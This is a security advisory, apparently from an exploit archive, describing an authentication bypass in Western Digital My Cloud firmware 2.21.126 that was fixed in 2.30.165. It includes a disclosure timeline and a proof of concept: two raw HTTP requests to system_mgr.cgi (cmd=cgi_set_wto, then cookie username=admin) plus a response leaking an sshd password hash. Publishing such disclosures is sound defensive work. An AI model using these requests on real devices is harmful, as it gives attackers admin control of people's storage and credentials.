exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Western Digital My Cloud 2.21.126 Authentication Bypass

Western Digital My Cloud 2.21.126 Authentication Bypass
Posted Apr 22, 2017
Authored by Securify B.V., Remco Vermeulen

Western Digital My Cloud with firmware version 2.21.126 suffers from an authentication bypass vulnerability that allows escalation to administrative privileges.

tags | exploit, bypass
SHA-256 | c88ab660fa85b41bb542f8f2b6aed37318c1e0f94c9900423143b3b9734eae97

Western Digital My Cloud 2.21.126 Authentication Bypass

Change Mirror Download
------------------------------------------------------------------------
Authentication bypass vulnerability in Western Digital My Cloud allows
escalation to admin privileges
------------------------------------------------------------------------
Remco Vermeulen, April 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Western Digital My Cloud is affected by an
authentication bypass vulnerability. An unauthenticated attacker can
exploit this vulnerability to authenticate as an admin user without
needing to provide a password, thereby gaining full control of the My
Cloud device.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This vulnerability was successfully verified on a Western Digital My
Cloud model WDBCTL0020HWT running firmware version 2.21.126. This issue
is not limited to the model that was used to find this vulnerability
since most of the products in the My Cloud series share the same
(vulnerable) code.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was fixed in firmware version 2.30.165.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170404/authentication_bypass_vulnerability_in_western_digital_my_cloud_allows_escalation_to_admin_privileges.html

Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.

It was found that it is possible for an unauthenticated attacker to create a valid session without requiring to log in. The system_mgr.cgi CGI module contains a command called cgi_set_wto that starts an admin session that is tied to the IP address of the user making the request. Subsequent invocation of commands that would normally require admin privileges are now authorized if an attacker sets the username=admin cookie.
Proof of concept

The following steps can be used to exploit this issue. First, establish an admin session tied to the IP of the requester:

POST /cgi-bin/system_mgr.cgi HTTP/1.1
Host: ***.***.***.***
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

cmd=cgi_set_wto

Next, call an endpoint (e.g., cgi_get_ssh_pw_status) that requires admin privileges and authenticate as admin by adding the cookie username=admin.

POST /cgi-bin/system_mgr.cgi HTTP/1.1
Host: ***.***.***.***
Cookie: username=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

cmd=cgi_get_ssh_pw_status

The Western Digital My Cloud device will now respond as follows, indicating success:

HTTP/1.1 200 OK
Date: Sat, 01 Jan 2000 00:18:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/xml
Content-Language: en
Content-Length: 113

<?xml version="1.0" encoding="UTF-8"?><ssh><info>sshd:$1$$CoERg7ynjYLsj2j4****.:14746:0:99999:7:::
</info></ssh><Paste>


Timeline

- 09 April 2017: Discovered vulnerability.
- 10 April 2017: Reported to Western Digital customer support.
- 10 April 2017: Response from Western Digital that the vulnerability has been forwarded to their vulnerability assessment team.
- 12 April 2017: Fix released in firmware 2.30.165. However, no response from Western Digital.
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close